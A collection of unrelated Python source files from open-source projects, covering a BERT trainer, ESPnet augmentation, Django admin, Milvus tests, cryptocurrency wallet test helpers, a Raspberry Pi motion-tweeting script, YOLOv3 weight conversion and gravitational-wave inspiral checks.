for metric in self.batch_metrics:
metric.reset()
def save_info(self, epoch, best):
model_save = self.model.module if hasattr(
self.model, 'module') else self.model
state = {"model": model_save,
'epoch': epoch,
'best': best}
return state
def valid_epoch(self, data):
pbar = ProgressBar(n_total=len(data))
self.epoch_reset()
self.model.eval()
with torch.no_grad():
for step, batch in enumerate(data):
batch = tuple(t.to(self.device) for t in batch)
input_ids, input_mask, segment_ids, label_ids = batch
logits = self.model(input_ids, input_mask, segment_ids)
self.outputs.append(logits.cpu().detach())
self.targets.append(label_ids.cpu().detach())
pbar.batch_step(step=step, info={}, bar_type='Evaluating')
self.outputs = torch.cat(self.outputs, dim=0).cpu().detach()
self.targets = torch.cat(self.targets, dim=0).cpu().detach()
loss = self.criterion(target=self.targets, output=self.outputs)
self.result['valid_loss'] = loss.item()
print("------------- valid result --------------")
if self.epoch_metrics:
for metric in self.epoch_metrics:
metric(logits=self.outputs, target=self.targets)
value = metric.value()
if value:
self.result[f'valid_{metric.name()}'] = value
if 'cuda' in str(self.device):
torch.cuda.empty_cache()
return self.result
def train_epoch(self, data):
pbar = ProgressBar(n_total=len(data))
tr_loss = AverageMeter()
self.epoch_reset()
for step, batch in enumerate(data):
self.batch_reset()
self.model.train()
batch = tuple(t.to(self.device) for t in batch)
input_ids, input_mask, segment_ids, label_ids = batch
print("input_ids, input_mask, segment_ids, label_ids SIZE: \n")
print(input_ids.size(), input_mask.size(),
segment_ids.size(), label_ids.size())
logits = self.model(input_ids, input_mask, segment_ids)
print("logits and label ids size: ",
logits.size(), label_ids.size())
loss = self.criterion(output=logits, target=label_ids)
if len(self.n_gpu) >= 2:
loss = loss.mean()
if self.gradient_accumulation_steps > 1:
loss = loss / self.gradient_accumulation_steps
            if self.fp16:
                from apex import amp  # local import: apex is an optional dependency
                with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
clip_grad_norm_(amp.master_params(
self.optimizer), self.grad_clip)
else:
loss.backward()
clip_grad_norm_(self.model.parameters(), self.grad_clip)
if (step + 1) % self.gradient_accumulation_steps == 0:
self.lr_scheduler.step()
self.optimizer.step()
self.optimizer.zero_grad()
self.global_step += 1
if self.batch_metrics:
for metric in self.batch_metrics:
metric(logits=logits, target=label_ids)
self.info[metric.name()] = metric.value()
self.info['loss'] = loss.item()
tr_loss.update(loss.item(), n=1)
if self.verbose >= 1:
pbar.batch_step(step=step, info=self.info, bar_type='Training')
self.outputs.append(logits.cpu().detach())
self.targets.append(label_ids.cpu().detach())
print("\n------------- train result --------------")
# epoch metric
self.outputs = torch.cat(self.outputs, dim=0).cpu().detach()
self.targets = torch.cat(self.targets, dim=0).cpu().detach()
self.result['loss'] = tr_loss.avg
if self.epoch_metrics:
for metric in self.epoch_metrics:
metric(logits=self.outputs, target=self.targets)
value = metric.value()
if value:
self.result[f'{metric.name()}'] = value
if "cuda" in str(self.device):
torch.cuda.empty_cache()
return self.result
def train(self, train_data, valid_data, seed):
seed_everything(seed)
print("model summary info: ")
for step, (input_ids, input_mask, segment_ids,
label_ids) in enumerate(train_data):
input_ids = input_ids.to(self.device)
input_mask = input_mask.to(self.device)
segment_ids = segment_ids.to(self.device)
summary(self.model, *(input_ids, input_mask,
segment_ids), show_input=True)
break
# ***************************************************************
for epoch in range(self.start_epoch, self.start_epoch+self.epochs):
self.logger.info(f"Epoch {epoch}/{self.epochs}")
train_log = self.train_epoch(train_data)
valid_log = self.valid_epoch(valid_data)
logs = dict(train_log, **valid_log)
show_info = f'\nEpoch: {epoch} - ' + "-".join(
[f' {key}: {value:.4f} ' for
key, value in logs.items()])
self.logger.info(show_info)
# save
if self.training_monitor:
self.training_monitor.epoch_step(logs)
# save model
if self.model_checkpoint:
state = self.save_info(epoch, best=logs['valid_loss'])
self.model_checkpoint.bert_epoch_step(
current=logs[self.model_checkpoint.monitor], state=state)
# early_stopping
if self.early_stopping:
self.early_stopping.epoch_step(
epoch=epoch, current=logs[self.early_stopping.monitor])
if self.early_stopping.stop_training:
break
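# --- Usage sketch (hypothetical): a minimal metric object compatible with the
# protocol the loops above rely on -- reset(), __call__(logits=..., target=...),
# value() and name().  The project's real metrics live in its own metrics
# module; this stand-alone version only documents the expected interface.
class ThresholdAccuracy:
    def __init__(self, thresh: float = 0.5):
        self.thresh = thresh
        self.correct = 0
        self.total = 0

    def reset(self):
        self.correct, self.total = 0, 0

    def __call__(self, logits, target):
        preds = (torch.sigmoid(logits) > self.thresh).float()
        self.correct += (preds == target).float().sum().item()
        self.total += target.numel()

    def value(self):
        return self.correct / max(self.total, 1)

    def name(self):
        return "threshold_accuracy"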
3cbac418fb631ae29ab6bb01c2c82b47b0016d22 | 426 | py | Python | espnet2/asr/specaug/abs_specaug.py | texpomru13/espnet | Apache-2.0 | stars: 5,053
from typing import Optional
from typing import Tuple
import torch
class AbsSpecAug(torch.nn.Module):
"""Abstract class for the augmentation of spectrogram
The process-flow:
Frontend -> SpecAug -> Normalization -> Encoder -> Decoder
"""
def forward(
self, x: torch.Tensor, x_lengths: torch.Tensor = None
) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
raise NotImplementedError
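# --- Usage sketch (hypothetical): a minimal concrete subclass.  ESPnet's real
# SpecAug applies configurable time/frequency warping and masking; the single
# random time mask below only illustrates the (x, x_lengths) contract, assuming
# (batch, time, freq) shaped features.
class TimeMaskOnly(AbsSpecAug):
    def __init__(self, mask_width: int = 20):
        super().__init__()
        self.mask_width = mask_width

    def forward(
        self, x: torch.Tensor, x_lengths: torch.Tensor = None
    ) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
        if self.training and x.size(1) > self.mask_width:
            start = int(torch.randint(0, x.size(1) - self.mask_width, (1,)))
            x = x.clone()
            x[:, start:start + self.mask_width, :] = 0.0
        return x, x_lengths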
d94a6e8dec73e26c18f7902bd83b61bf0417745e | 1,532 | py | Python | setup.py | CIRAIG/bw2waterbalancer | MIT | stars: 1
from setuptools import setup, find_packages
import os
packages = []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
f = open('README.md')
readme = f.read()
f.close()
setup(
name='bw2waterbalancer',
version="0.1.1",
packages=find_packages(),
package_data={'bw2waterbalancer': ['data/*.json']},
author="Pascal Lesage",
author_email="pascal.lesage@polymtl.ca",
license="MIT; LICENSE.txt",
install_requires=[
'brightway2',
'numpy',
'pyprind',
'presamples',
],
url="https://gitlab.com/pascal.lesage/bw2waterbalance",
long_description=readme,
long_description_content_type="text/markdown",
description='Package used to create balanced LCA water exchange samples to override unbalanced sample in Brightway2.',
classifiers=[
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
],
)
1131e3f830067838563bd78f08acb9e4c1989ad3 | 1,462 | py | Python | app/core/admin.py | gaylonalfano/recipe-app-api | MIT
# core/admin.py
from django.contrib import admin
# Import default user admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
# Import gettext for supporting multiple languages using translation engine
from django.utils.translation import gettext as _
# Import our models
from core import models
# Now create our custom user admin
class UserAdmin(BaseUserAdmin):
# change the ordering we will set to the id of the object
ordering = ['id']
# Going to list them by email and name and order by id
list_display = ['email', 'name']
# Customize our user admin fieldsets. Reference Notion notes!
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Personal Info'), {'fields': ('name',)}),
(
_('Permissions'),
{'fields': ('is_active', 'is_staff', 'is_superuser')}
),
(_('Important Dates'), {'fields': ('last_login',)})
)
# Configure add_fieldsets var to define fields in /add page
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2')
}),
)
# Register our UserAdmin class to our User model
admin.site.register(models.User, UserAdmin)
# Register our Tag model
admin.site.register(models.Tag)
# Register our Ingredient model
admin.site.register(models.Ingredient)
# Register our Recipe model (just created migrations file)
admin.site.register(models.Recipe)
14678fba7c84281c75024e17ee0ffd7e3ddced56 | 1,484 | py | Python | tests/python_client/deploy/scripts/action_after_upgrade.py | suibianmzl/milvus | Apache-2.0 | stars: 1
from pymilvus import connections
from utils import *
def task_1(data_size, host):
"""
task_1:
before upgrade: create collection and insert data, load and search
after upgrade: get collection, load, search, create index, load, and search
"""
prefix = "task_1_"
connections.connect(host=host, port=19530, timeout=60)
get_collections(prefix)
load_and_search(prefix)
create_collections_and_insert_data(prefix, data_size)
create_index(prefix)
load_and_search(prefix)
def task_2(data_size, host):
"""
task_2:
before upgrade: create collection, insert data and create index, load and search
after upgrade: get collection, load, search, insert data, create index, load, and search
"""
prefix = "task_2_"
connections.connect(host=host, port=19530, timeout=60)
get_collections(prefix)
load_and_search(prefix)
create_collections_and_insert_data(prefix, data_size)
create_index(prefix)
load_and_search(prefix)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='config for deploy test')
parser.add_argument('--host', type=str, default="127.0.0.1", help='milvus server ip')
parser.add_argument('--data_size', type=int, default=3000, help='data size')
args = parser.parse_args()
data_size = args.data_size
host = args.host
print(f"data size: {data_size}")
task_1(data_size, host)
    task_2(data_size, host)
587a9ac5b170a32a3dbab8d7fedc0ba02c2f27ab | 4,957 | py | Python | test/functional/test_framework/wallet_util.py | Stackout/pexa-backport | MIT
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Pexa Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Useful util functions for testing the wallet"""
from collections import namedtuple
from test_framework.address import (
key_to_p2pkh,
key_to_p2sh_p2wpkh,
key_to_p2wpkh,
script_to_p2sh,
script_to_p2sh_p2wsh,
script_to_p2wsh,
)
from test_framework.key import (
bytes_to_wif,
ECKey,
)
from test_framework.script import (
CScript,
OP_0,
OP_2,
OP_3,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_DUP,
OP_EQUAL,
OP_EQUALVERIFY,
OP_HASH160,
hash160,
sha256,
)
from test_framework.util import hex_str_to_bytes
Key = namedtuple('Key', ['privkey',
'pubkey',
'p2pkh_script',
'p2pkh_addr',
'p2wpkh_script',
'p2wpkh_addr',
'p2sh_p2wpkh_script',
'p2sh_p2wpkh_redeem_script',
'p2sh_p2wpkh_addr'])
Multisig = namedtuple('Multisig', ['privkeys',
'pubkeys',
'p2sh_script',
'p2sh_addr',
'redeem_script',
'p2wsh_script',
'p2wsh_addr',
'p2sh_p2wsh_script',
'p2sh_p2wsh_addr'])
def get_key(node):
"""Generate a fresh key on node
Returns a named tuple of privkey, pubkey and all address and scripts."""
addr = node.getnewaddress()
pubkey = node.getaddressinfo(addr)['pubkey']
pkh = hash160(hex_str_to_bytes(pubkey))
return Key(privkey=node.dumpprivkey(addr),
pubkey=pubkey,
p2pkh_script=CScript([OP_DUP, OP_HASH160, pkh, OP_EQUALVERIFY, OP_CHECKSIG]).hex(),
p2pkh_addr=key_to_p2pkh(pubkey),
p2wpkh_script=CScript([OP_0, pkh]).hex(),
p2wpkh_addr=key_to_p2wpkh(pubkey),
p2sh_p2wpkh_script=CScript([OP_HASH160, hash160(CScript([OP_0, pkh])), OP_EQUAL]).hex(),
p2sh_p2wpkh_redeem_script=CScript([OP_0, pkh]).hex(),
p2sh_p2wpkh_addr=key_to_p2sh_p2wpkh(pubkey))
def get_generate_key():
"""Generate a fresh key
Returns a named tuple of privkey, pubkey and all address and scripts."""
eckey = ECKey()
eckey.generate()
privkey = bytes_to_wif(eckey.get_bytes())
pubkey = eckey.get_pubkey().get_bytes().hex()
pkh = hash160(hex_str_to_bytes(pubkey))
return Key(privkey=privkey,
pubkey=pubkey,
p2pkh_script=CScript([OP_DUP, OP_HASH160, pkh, OP_EQUALVERIFY, OP_CHECKSIG]).hex(),
p2pkh_addr=key_to_p2pkh(pubkey),
p2wpkh_script=CScript([OP_0, pkh]).hex(),
p2wpkh_addr=key_to_p2wpkh(pubkey),
p2sh_p2wpkh_script=CScript([OP_HASH160, hash160(CScript([OP_0, pkh])), OP_EQUAL]).hex(),
p2sh_p2wpkh_redeem_script=CScript([OP_0, pkh]).hex(),
p2sh_p2wpkh_addr=key_to_p2sh_p2wpkh(pubkey))
def get_multisig(node):
"""Generate a fresh 2-of-3 multisig on node
Returns a named tuple of privkeys, pubkeys and all address and scripts."""
addrs = []
pubkeys = []
for _ in range(3):
addr = node.getaddressinfo(node.getnewaddress())
addrs.append(addr['address'])
pubkeys.append(addr['pubkey'])
script_code = CScript([OP_2] + [hex_str_to_bytes(pubkey) for pubkey in pubkeys] + [OP_3, OP_CHECKMULTISIG])
witness_script = CScript([OP_0, sha256(script_code)])
return Multisig(privkeys=[node.dumpprivkey(addr) for addr in addrs],
pubkeys=pubkeys,
p2sh_script=CScript([OP_HASH160, hash160(script_code), OP_EQUAL]).hex(),
p2sh_addr=script_to_p2sh(script_code),
redeem_script=script_code.hex(),
p2wsh_script=witness_script.hex(),
p2wsh_addr=script_to_p2wsh(script_code),
p2sh_p2wsh_script=CScript([OP_HASH160, witness_script, OP_EQUAL]).hex(),
p2sh_p2wsh_addr=script_to_p2sh_p2wsh(script_code))
def test_address(node, address, **kwargs):
"""Get address info for `address` and test whether the returned values are as expected."""
addr_info = node.getaddressinfo(address)
for key, value in kwargs.items():
if value is None:
if key in addr_info.keys():
raise AssertionError("key {} unexpectedly returned in getaddressinfo.".format(key))
elif addr_info[key] != value:
raise AssertionError("key {} value {} did not match expected value {}".format(key, addr_info[key], value))
db31b90359641493ef788c292665f0f9203dee36 | 4,877 | py | Python | tweet_motion_jpg.py | syncom/twitimg | Apache-2.0 | stars: 1
#!/usr/bin/env python
"""Tweet motion-detected JPEG image.
This module captures and tweets a motion-detected JPEG image from a Raspberry
Pi with a camera module. The image capture part is credited to the excellent
post https://www.raspberrypi.org/forums/viewtopic.php?t=45235, by brainflakes.
Read brainflakes' original post for the algorithm. I have removed the force
capture part for this script.
"""
import StringIO
import subprocess
import os
import time
import argparse
from datetime import datetime
from PIL import Image
import importlib
from twython import Twython
# Motion detection settings:
# - threshold: how much a pixel has to change by to be marked as "changed"
# - sensitivity: how many changed pixels before capturing an image
threshold = 10
sensitivity = 800
test_width = 100
test_height = 75
# File settings
save_width = 1280
save_height = 960
reserve_diskspace = 40 * 1024 * 1024 # Keep 40 mb free on disk
# Capture a small bitmap test image, for motion detection
def captureTestImage():
command = "raspistill -n -w %s -h %s -t 1000 -e bmp -o -" % (test_width,
test_height)
output = None
image_data = StringIO.StringIO()
try:
output = subprocess.check_output(command, shell=True)
except subprocess.CalledProcessError:
print "Command exited with non-zero code. No output."
return None, None
if output:
image_data.write(output)
image_data.seek(0)
im = Image.open(image_data)
buffer = im.load()
image_data.close()
return im, buffer
# Save a full size image to disk
def saveImage(width, height, dirname, diskSpaceToReserve):
keepDiskSpaceFree(dirname, diskSpaceToReserve)
time = datetime.now()
filename = "motion-%04d%02d%02d-%02d%02d%02d.jpg" % (time.year, time.month, time.day, time.hour, time.minute, time.second)
command = "raspistill -n -w %s -h %s -t 10 -e jpg -q 15 -o %s/%s" % (width, height, dirname.rstrip('/'), filename)
try:
subprocess.call(command, shell=True)
except subprocess.CalledProcessError:
print "Command exited with non-zero code. No file captured."
return None
print "Captured %s/%s" % (dirname.rstrip('/'), filename)
return dirname.rstrip('/') + '/' + filename
# Keep free space above given level
def keepDiskSpaceFree(dirname, bytesToReserve):
if (getFreeSpace(dirname) < bytesToReserve):
for filename in sorted(os.listdir(dirname)):
if filename.startswith("motion") and filename.endswith(".jpg"):
os.remove(dirname.rstrip('/') +"/" + filename)
print "Deleted %s/%s to avoid filling disk" % ( dirname.rstrip('/'), filename )
if (getFreeSpace(dirname) > bytesToReserve):
return
return
# Get available disk space
def getFreeSpace(dir):
st = os.statvfs(dir)
du = st.f_bavail * st.f_frsize
return du
# Where work happens
def do_tweet_motion(dirname):
mod = importlib.import_module("tweet_image")
# Get first image
captured1 = False
while (not captured1):
image1, buffer1 = captureTestImage()
if image1:
captured1 = True
while (True):
# Time granule for wait in the case of error/exception
basic_wait = 300
# Double multiplicity when error/exception happens
mult = 1
# Get comparison image
captured2 = False
while (not captured2):
image2, buffer2 = captureTestImage()
if image2:
captured2 = True
# Count changed pixels
changedPixels = 0
for x in xrange(0, test_width):
for y in xrange(0, test_height):
# Just check green channel as it's the highest quality channel
pixdiff = abs(buffer1[x,y][1] - buffer2[x,y][1])
if pixdiff > threshold:
changedPixels += 1
# Save an image if pixels changed
if changedPixels > sensitivity:
fpath = saveImage(save_width, save_height, dirname, reserve_diskspace)
# Tweet saved image
if fpath:
try:
mod.do_tweet(fpath)
mult = 1
except Exception as e:
print "Tweet failed. Encountered exception, as follows: "
print(e)
sleeptime = mult * basic_wait
time.sleep(sleeptime) # Wait some time
print("Retry after {0} seconds".format(sleeptime))
mult = mult * 2
# Swap comparison buffers
image1 = image2
buffer1 = buffer2
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("dir_path")
args = parser.parse_args()
do_tweet_motion(args.dir_path)
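# --- Usage sketch (hypothetical): exercising the pixel-difference rule from
# brainflakes' algorithm on two in-memory PIL images (RGB, at least
# test_width x test_height) instead of raspistill output, e.g. to tune
# `threshold` and `sensitivity` on a machine without a camera.
def count_changed_pixels(image_a, image_b):
    buf_a, buf_b = image_a.load(), image_b.load()
    changed = 0
    for x in xrange(0, test_width):
        for y in xrange(0, test_height):
            # green channel only, mirroring the main capture loop above
            if abs(buf_a[x, y][1] - buf_b[x, y][1]) > threshold:
                changed += 1
    return changed, changed > sensitivity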
c088a33edc880ce4aa89e86bc61efab784996be5 | 3,479 | py | Python | models/yolov3/conversion/reconstruct_conv_layer.py | martinGalajdaSchool/object-detection | Apache-2.0 | stars: 2
from typing import Dict, Any
from keras import backend as K
import keras
import numpy as np
from keras.layers import (
Conv2D,
ZeroPadding2D,
)
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.regularizers import l2
from models.yolov3.conversion.constants import YoloV3Activations
def parse_conv_layer(
*,
prev_layer: keras.layers.Layer,
layer_config: Dict[str, Any],
weight_decay: float,
weights_file: Any
):
weight_read = 0
filters = int(layer_config['filters'])
size = int(layer_config['size'])
stride = int(layer_config['stride'])
pad = int(layer_config['pad'])
activation = layer_config['activation']
batch_normalize = 'batch_normalize' in layer_config
# padding = 'same' is equivalent to pad = 1 in Darknet
padding = 'same' if pad == 1 and stride == 1 else 'valid'
# Darknet serializes convolutional weights as:
# [bias/beta, [gamma, mean, variance], conv_weights]
prev_layer_shape = K.int_shape(prev_layer)
# This assumes channel last dimension ordering.
weights_shape = (size, size, prev_layer_shape[-1], filters)
darknet_w_shape = (filters, weights_shape[2], size, size)
weights_size = np.product(weights_shape)
print('with batch normalization' if batch_normalize else ' ', activation, weights_shape)
conv_bias = np.ndarray(
shape=(filters,),
dtype='float32',
buffer=weights_file.read(filters * 4))
weight_read += filters
if batch_normalize:
bn_weights = np.ndarray(
shape=(3, filters),
dtype='float32',
buffer=weights_file.read(filters * 12))
weight_read += 3 * filters
bn_weight_list = [
bn_weights[0], # <-- scale gamma
conv_bias, # <-- shift beta
bn_weights[1], # <-- running mean
bn_weights[2] # <-- running var
]
conv_weights = np.ndarray(
shape=darknet_w_shape,
dtype='float32',
buffer=weights_file.read(weights_size * 4))
weight_read += weights_size
# DarkNet conv_weights are serialized Caffe-style: (output_dim, input_dim, height, width)
# We need to set them into Tensorflow order: (height, width, input_dim, output_dim)
height_dim_pos, width_dim_pos, input_dim_pos, output_dim_pos = 2, 3, 1, 0
conv_weights = np.transpose(conv_weights, [height_dim_pos, width_dim_pos, input_dim_pos, output_dim_pos])
conv_weights = [conv_weights] if batch_normalize else [
conv_weights,
conv_bias
]
if stride > 1:
# Darknet uses left and top padding instead of 'same' mode
prev_layer = ZeroPadding2D(((1, 0), (1, 0)))(prev_layer)
# Create Conv2D layer
conv_layer = (Conv2D(
filters,
(size, size),
strides=(stride, stride),
kernel_regularizer=l2(weight_decay),
use_bias=not batch_normalize,
weights=conv_weights,
activation=None,
padding=padding))(prev_layer)
if batch_normalize:
conv_layer = (BatchNormalization(weights=bn_weight_list))(conv_layer)
if activation == YoloV3Activations.LINEAR:
return conv_layer, weight_read
if activation == YoloV3Activations.LEAKY:
conv_layer = LeakyReLU(alpha=0.1)(conv_layer)
return conv_layer, weight_read
raise ValueError(f'Unknown activation function `{activation}`.')
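# --- Usage sketch (hypothetical): feeding parse_conv_layer a minimal Darknet
# [convolutional] section and a zero-filled weight buffer, to show the expected
# layer_config keys and how weight_read accounts for bias, batch-norm and
# convolution weights.  The 416x416x3 input and 16 filters are arbitrary.
def _demo_parse_conv_layer():
    import io
    inputs = keras.layers.Input(shape=(416, 416, 3))
    layer_config = {
        'filters': '16', 'size': '3', 'stride': '1', 'pad': '1',
        'activation': 'leaky', 'batch_normalize': '1',
    }
    # 16 biases + 3*16 batch-norm params + 3*3*3*16 convolution weights
    n_floats = 16 + 3 * 16 + 3 * 3 * 3 * 16
    fake_weights = io.BytesIO(np.zeros(n_floats, dtype='float32').tobytes())
    layer, n_read = parse_conv_layer(prev_layer=inputs,
                                     layer_config=layer_config,
                                     weight_decay=5e-4,
                                     weights_file=fake_weights)
    return layer, n_read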
db0a415f964ef500015b723dc104a1b9c790c06d | 10,256 | py | Python | tests/crosschecks1711.09706.py | Lukas-Hoelker/SIDM-GWs | MIT | stars: 1
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import UnivariateSpline, interp1d
from scipy.integrate import quad
import collections
from imripy import halo
from imripy import merger_system as ms
from imripy import inspiral
from imripy import waveform
inspiral.Classic.ln_Lambda=3.
def Meff(sp, r):
return np.where(r > sp.r_isco(), sp.m1 - 4.*np.pi*sp.halo.rho_spike*sp.halo.r_spike**3 *sp.r_isco()**(3.-sp.halo.alpha) /(3.-sp.halo.alpha), sp.m1)
def F(sp, r):
return np.where(r > sp.r_isco(), 4.*np.pi * sp.halo.rho_spike*sp.halo.r_spike**sp.halo.alpha /(3.-sp.halo.alpha), 0.)
def coeffs(sp):
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
m2 = sp.m2
if isinstance(m2, (np.ndarray, collections.Sequence)):
m2 = m2[-1]
c_gw = 256./5.* m2 * Meff(sp, 2.*sp.r_isco())**2 * eps**(4./(3.-alpha))
c_df = 8.*np.pi*m2 *sp.halo.rho_spike *sp.halo.r_spike**alpha * 3. \
* Meff(sp, 2.*sp.r_isco())**(-3./2.)* eps**((2.*alpha-3.)/(6.-2.*alpha))
ctild = c_df/c_gw
return c_gw, c_df, ctild
def b_A(sp, x, alpha):
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
r = x/eps**(1./(3.-alpha))
omega_s = np.sqrt(Meff(sp, r)/r**3 + F(sp, r)/r**(sp.halo.alpha))
return 4. * r**2 * omega_s**2 / inspiral.Classic.ln_Lambda * (1. + r**2 * omega_s**2)
def f_gw(x, alpha):
return (1.+x**(3.-alpha))**3 / ( 4.*x**3 * ( 1.+ (4.-alpha) *x**(3.-alpha) ) )
def f_df(x, alpha):
return 1. / ( (1.+x**(3.-alpha))**(1./2.) * ( 1.+ (4.-alpha) *x**(3.-alpha) )* x**(-5./2.+alpha) )
def plotDiffEq(sp, r0, r1):
r = np.geomspace(r0, r1, num=100)
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
x = eps**(1./(3.-alpha))*r
c_gw, c_df, ctild = coeffs(sp)
print(c_gw*ms.year_to_pc, c_df*ms.year_to_pc)
l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_gw_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{gw}/dt / dE_{orbit}/dR$', alpha=0.5)
plt.loglog(r/sp.r_isco(), c_gw*f_gw(x, alpha) , label='$c_{gw}f_{gw}$', color=l.get_c(), linestyle='--')
l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_df_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{df}/dt / dE_{orbit}/dR$', alpha=0.5)
plt.loglog(r/sp.r_isco(), c_df* f_df(x, alpha), label='$c_{df}f_{df}$' , color=l.get_c(), linestyle='--')
l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_acc_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{acc}/dt / dE_{orbit}/dR$', alpha=0.5)
plt.loglog(r/sp.r_isco(), c_df* f_df(x, alpha)*b_A(sp, x, alpha), label='$c_{df}f_{df}b_A$' , color=l.get_c(), linestyle='--')
plt.xlabel('$r/r_{ISCO}$')
def J(x, alpha):
return 4. * x**(11./2. - alpha) / (1. + x**(3.-alpha))**(7./2.)
def K(x, alpha):
return (1.+x**(3.-alpha))**(5./2.) * (1. + alpha/3.*x**(3.-alpha)) / (1. + (4.-alpha)*x**(3-alpha) )
def plotPhiprimeprime(sp, r0, r1):
r = np.geomspace(r0, r1, num=100)
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
x = eps**(1./(3.-alpha))*r
c_gw, c_df, ctild = coeffs(sp)
plt.loglog(r/sp.r_isco(), Meff(sp, 2.*sp.r_isco())**(1./2.) * eps**(3./2./(3.-alpha)) \
* c_gw*(1.+ctild*J(x, alpha)*(1.+b_A(sp, x, alpha))) *3./4.* K(x,alpha) * x**(-11./2.), label=r'$\ddot{\Phi}^{paper}$' )
#plt.loglog(r/sp.r_isco(), Meff(sp, 2.*sp.r_isco)**(1./2.) * eps**(3./2./(3.-alpha)) \
# * (c_gw*f_gw(x, alpha) + c_df*f_df(x, alpha)) * (3. + alpha*x**(3.-alpha))/(x**(5./2.) * (1.+ x**(3.-alpha))**(1./2.) ), label=r'$\ddot{\Phi}^{paper,ref}$' )
plt.loglog(r/sp.r_isco(), (sp.mass(r)/r**3 )**(-1./2.) * (-3.*sp.mass(r)/r**4 + 4.*np.pi *sp.halo.density(r)/r )* inspiral.Classic.da_dt(sp, r), label=r'$\ddot{\Phi}^{code}$')
plt.xlabel(r'$r/r_{ISCO}$')
def L(sp, f):
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
c_gw, c_df, ctild = coeffs(sp)
c_eps = Meff(sp, 2.*sp.r_isco())**(11./6.-1./3.*alpha) * ctild * eps**((11.-2.*alpha)/(6.-2.*alpha))
b_eps = (np.pi*f * Meff(sp, 2.*sp.r_isco()))**(2./3.) / inspiral.Classic.ln_Lambda * (1. + (np.pi*f * Meff(sp, 2.*sp.r_isco()))**(2./3.))
deltatild = (1./np.pi**2 / f**2)**(1.-alpha/3.)
return 1. + 4.*c_eps*deltatild**((11.-2.*alpha)/(6.-2.*alpha)) * (1. + b_eps)
def phaseIntegrand(sp, f):
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
delta = (Meff(sp, 2.*sp.r_isco())/ np.pi**2 / f**2)**((3.-alpha)/3.)
chi = 1. + delta*eps/3. + (2.-alpha)/9. *delta**2 * eps**2
x = (delta*eps)**(1./(3.-alpha)) *chi
c_gw, c_df, ctild = coeffs(sp)
return chi**(11./2.) / f**(8./3.) / K(x, alpha) / (1. + ctild*J(x,alpha)*(1. + b_A(sp, x, alpha)))
def plotPhase(sp, t, R, omega_s):
#f = np.geomspace(omega_s[1], omega_s[-2], num=200)/np.pi
#f_isco = f[-1]
f_gw = omega_s/np.pi
f_isco = f_gw[-1]
t_c = t[-1] + 5./256. * R[-1]**4/sp.m_total()**2 / sp.m_reduced()
if isinstance(t_c, (np.ndarray, collections.Sequence)):
t_c = t_c[-1]
PhiTild0 = - 3./4. * (8.*np.pi*sp.m_chirp()*f_gw)**(-5./3.) + 3./4.*(8.*np.pi*sp.m_chirp()*f_isco)**(-5./3.)
#plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild0, label=r'$\tilde{\Phi}_0^{analytic}$')
t_of_f = interp1d(omega_s/np.pi, t, kind='cubic', bounds_error=True)
#omega_gw = UnivariateSpline(t, 2*omega_s, ext=1, k=5 )
omega_gw = interp1d(t, 2*omega_s, kind='cubic', bounds_error=False, fill_value='extrapolate' )
#Phit = np.array([quad(lambda u: np.exp(u)*omega_gw(np.exp(u)), np.log(t[0]), np.log(y0))[0] for y0 in t ])
Phit = np.cumsum([quad(lambda t: omega_gw(t), t[i-1], t[i], limit=500, epsrel=1e-13, epsabs=1e-13)[0] if not i == 0 else 0. for i in range(len(t)) ])
#Phi = interp1d(t, Phit - Phit[-1], kind='cubic', bounds_error=False, fill_value='extrapolate')(t_of_f(f_gw))
Phi = Phit - Phit[-1]
tpt = 2.*np.pi*f_gw * (t - t[-1])
PhiTild = tpt - Phi
DeltaPhi = PhiTild - PhiTild0
plt.plot(f_gw*ms.year_to_pc*3.17e-8, Phi, label=r'$\Phi^{code}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, tpt, label=r'$2\pi t^{code}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild, label=r'$\tilde{\Phi}^{code}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, DeltaPhi, label=r'$\Delta\tilde{\Phi}^{code}$')
#integrand = UnivariateSpline(np.log(f), f* f**(-8./3.)/L(sp, f), k=5)
